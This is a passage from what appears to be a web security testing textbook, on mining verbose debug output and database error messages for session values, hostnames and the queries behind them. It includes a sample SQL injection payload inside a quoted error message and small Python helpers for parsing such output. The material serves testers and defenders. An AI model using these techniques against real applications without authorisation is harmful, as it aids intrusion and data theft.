ReturnURL ../default/fedefault.aspx

SessionUser.Key f7e50aef8fadd30f31f3aea104cef26ed2ce2be50073c

SessionClient.ID 306

SessionClient.ReviewID 245

UPriv.2100

SessionUser.NetworkLevelUser 0

UPriv.2200

SessionUser.BranchLevelUser 0

SessionDatabase fd219.prod.wahh-bank.com

The following items are commonly included in verbose debug messages:

■ Values of key session variables that can be manipulated via user input.

■ Hostnames and credentials for back-end components such as databases.

■ File and directory names on the server.

■ Information embedded within meaningful session tokens (see Chapter 7).

■ Encryption keys used to protect data transmitted via the client (see Chapter 5).

■ Debug information for exceptions arising in native code components, including the values of CPU registers, contents of the stack, and a list of the loaded DLLs and their base addresses (see Chapter 15).

When this kind of error reporting functionality is present in live production code, it may represent a critical weakness in the security of the application. You should review it closely to identify any items that can be used to further advance your attack, and any ways in which you can supply crafted input to manipulate the application’s state and control the information retrieved.
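
One way to make this review more systematic is sketched below in Python. It assumes a dump laid out like the earlier example, with one "name value" pair per line, and flags entries whose names contain keywords of likely interest. The function names and the INTERESTING keyword list are hypothetical and should be tuned to the application you are testing.

```python
# Hypothetical keywords; extend these for the target application.
INTERESTING = ("auth", "key", "password", "database", "url")


def parse_debug_dump(text):
    """Parse 'name value' lines into a dict.

    Lines with a single token (session IDs, bare privilege names) and
    banner lines made only of '-' or '*' characters are skipped.
    """
    items = {}
    for line in text.splitlines():
        parts = line.split(None, 1)  # split at the first run of whitespace
        if len(parts) == 2 and not set(parts[0]) <= set("-*"):
            items[parts[0]] = parts[1].strip()
    return items


def flag_interesting(items, keywords=INTERESTING):
    """Return only the entries whose names contain one of the keywords."""
    return {name: value for name, value in items.items()
            if any(word in name.lower() for word in keywords)}
```

Applied to the earlier dump, this would surface entries such as SessionUser.Auth, SessionUser.Key, LoginURL, ReturnURL, and SessionDatabase. A keyword match is only a starting point, so you should still read the full output by hand.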

Server and Database Messages

Informative error messages are often returned not by the application itself but

by some back-end component such as a database, mail server, or SOAP server.

If a completely unhandled error occurs, the application will typically respond

with an HTTP 500 status code, and the response body may contain further

information about the error. In other cases, the application may handle the

error gracefully and return a customized message to the user, sometimes

including error information generated by the back-end component.


Database error messages often contain information that you can use to

advance an attack. For example, they often disclose the query that generated

the error, enabling you to fine-tune a SQL injection attack:

Failed to retrieve row with statement - SELECT object_data FROM deftr.tblobject WHERE object_id = 'FDJE00012' AND project_id = 'FOO' and 1=2--'

See Chapter 9 for a detailed methodology describing how to develop database attacks and extract information based on error messages.
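
As a small illustration of how a disclosed query can guide your input, the following Python sketch pulls the SQL statement out of an error message and shows what surrounds the string you submitted. It is a sketch under stated assumptions: the function names are hypothetical, the message is assumed to be plain text that ends with the query, and only statements beginning with SELECT, INSERT, UPDATE, or DELETE are recognized.

```python
import re

# Assumption: the disclosed statement runs from its first keyword to the
# end of the message.
SQL_RE = re.compile(r"\b(?:SELECT|INSERT|UPDATE|DELETE)\b.*",
                    re.IGNORECASE | re.DOTALL)


def disclosed_query(message):
    """Return the SQL statement found in an error message, with runs of
    whitespace collapsed, or None if no statement is present."""
    match = SQL_RE.search(message)
    if match is None:
        return None
    return " ".join(match.group(0).split())


def injection_context(query, payload):
    """Return the query text before and after the submitted payload,
    or None if the payload does not appear verbatim in the query."""
    index = query.find(payload)
    if index == -1:
        return None
    return query[:index], query[index + len(payload):]
```

For the message shown above and the payload FOO' and 1=2--, the text before the payload ends with project_id = ' and the text after it is a single quotation mark. This suggests that the input lands inside a single-quoted string and that the trailing quote is being commented out.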

HACK STEPS

■ When you are probing the application for common vulnerabilities by submitting crafted attack strings in different parameters, always monitor the application’s responses to identify any error messages that may contain useful information.

■ Be aware that error information which is returned within the server’s

response may not be rendered on-screen within the browser. An efficient

way to identify many error conditions is to search each raw response for

keywords that are often contained in error messages. For example:

error

exception

illegal

invalid

fail

stack

access